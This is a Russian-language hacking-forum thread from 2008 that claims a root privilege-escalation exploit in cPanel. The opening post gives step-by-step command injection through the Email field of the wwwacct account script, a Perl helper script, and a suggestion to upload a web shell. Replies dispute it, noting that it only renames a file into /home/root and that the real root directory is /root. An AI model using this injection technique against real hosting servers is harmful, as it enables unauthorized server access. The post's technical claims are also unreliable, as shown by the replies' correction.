Cpanel all versions.

Discussion in 'Веб-уязвимости' started by КВР, 19 Jun 2008.

  1. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    Cpanel



    Версия:     все

    риск: очень высокий

    Этот баг может привести к поднятию привелегий до рута

    Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт

    официальный сайт: Cpanel.net

    Code:
    
[COLOR=LemonChiffon]Как это работает?[/color]

Что происходит когда ты создаёш аккаунт ?

./script/wwwact [domainname] [username] [password] [Email address] lab lab lab

Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)

[COLOR=LemonChiffon]К примеру[/COLOR]:

http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab

iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)

так ты можеш выполнять любые команды, к примеру

./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)


()()()()()()()()()()()()()

[COLOR=LemonChiffon]Проверим[/color]:

++++++++++++++++++++++++++

[COLOR=LemonChiffon]Шаг первый[/color]

сохроните в фаил  /home/user/public_html/do.pl .

#!/usr/bin/perl

$old='/home/user/public_html/test.txt';

$new='/home/root/kon.txt';

rename $old, $new;

++++++++++++++++++++++++++

[COLOR=LemonChiffon]Шаг второй
[/color]
пазовите фаил test.txt в твоей public_html директории.

path will be : /home/user/public_html/test.txt .

++++++++++++++++++++++++++

[COLOR=LemonChiffon]Шаг третий[/color]

создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box

и нажмите нопку создать.

Теперь ты сможеш видеть /home/root/ .

++++++++++++++++++++++++++

()()()()()()()()()()()()()

Ты можеш выполнить и ваш собственный код !Залить шелл и тп.
     
    #1 КВР, 19 Jun 2008
    Last edited: 19 Jun 2008
  2. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    эээ... ты просто переименовал каталог... а рутовый каталог вообще то находится по адресу /root
    а "багу" ты сам нашел? или взял откуда то? потому что то что ты тут описал тебе абсолютно не даст...
     
    #2 gisTy, 4 Jul 2008
  3. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    #3 otmorozok428, 5 Jul 2008
  4. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    ты посмотри что он делает.. он переименовывает каталог из /home/user в /home/root.. это ему ничего не даст так как рутовый каталог лежит по адресу /root а не /home/root.. поэтому все что тут описано на мой взгляд является полнейшим бредом
     
    #4 gisTy, 5 Jul 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.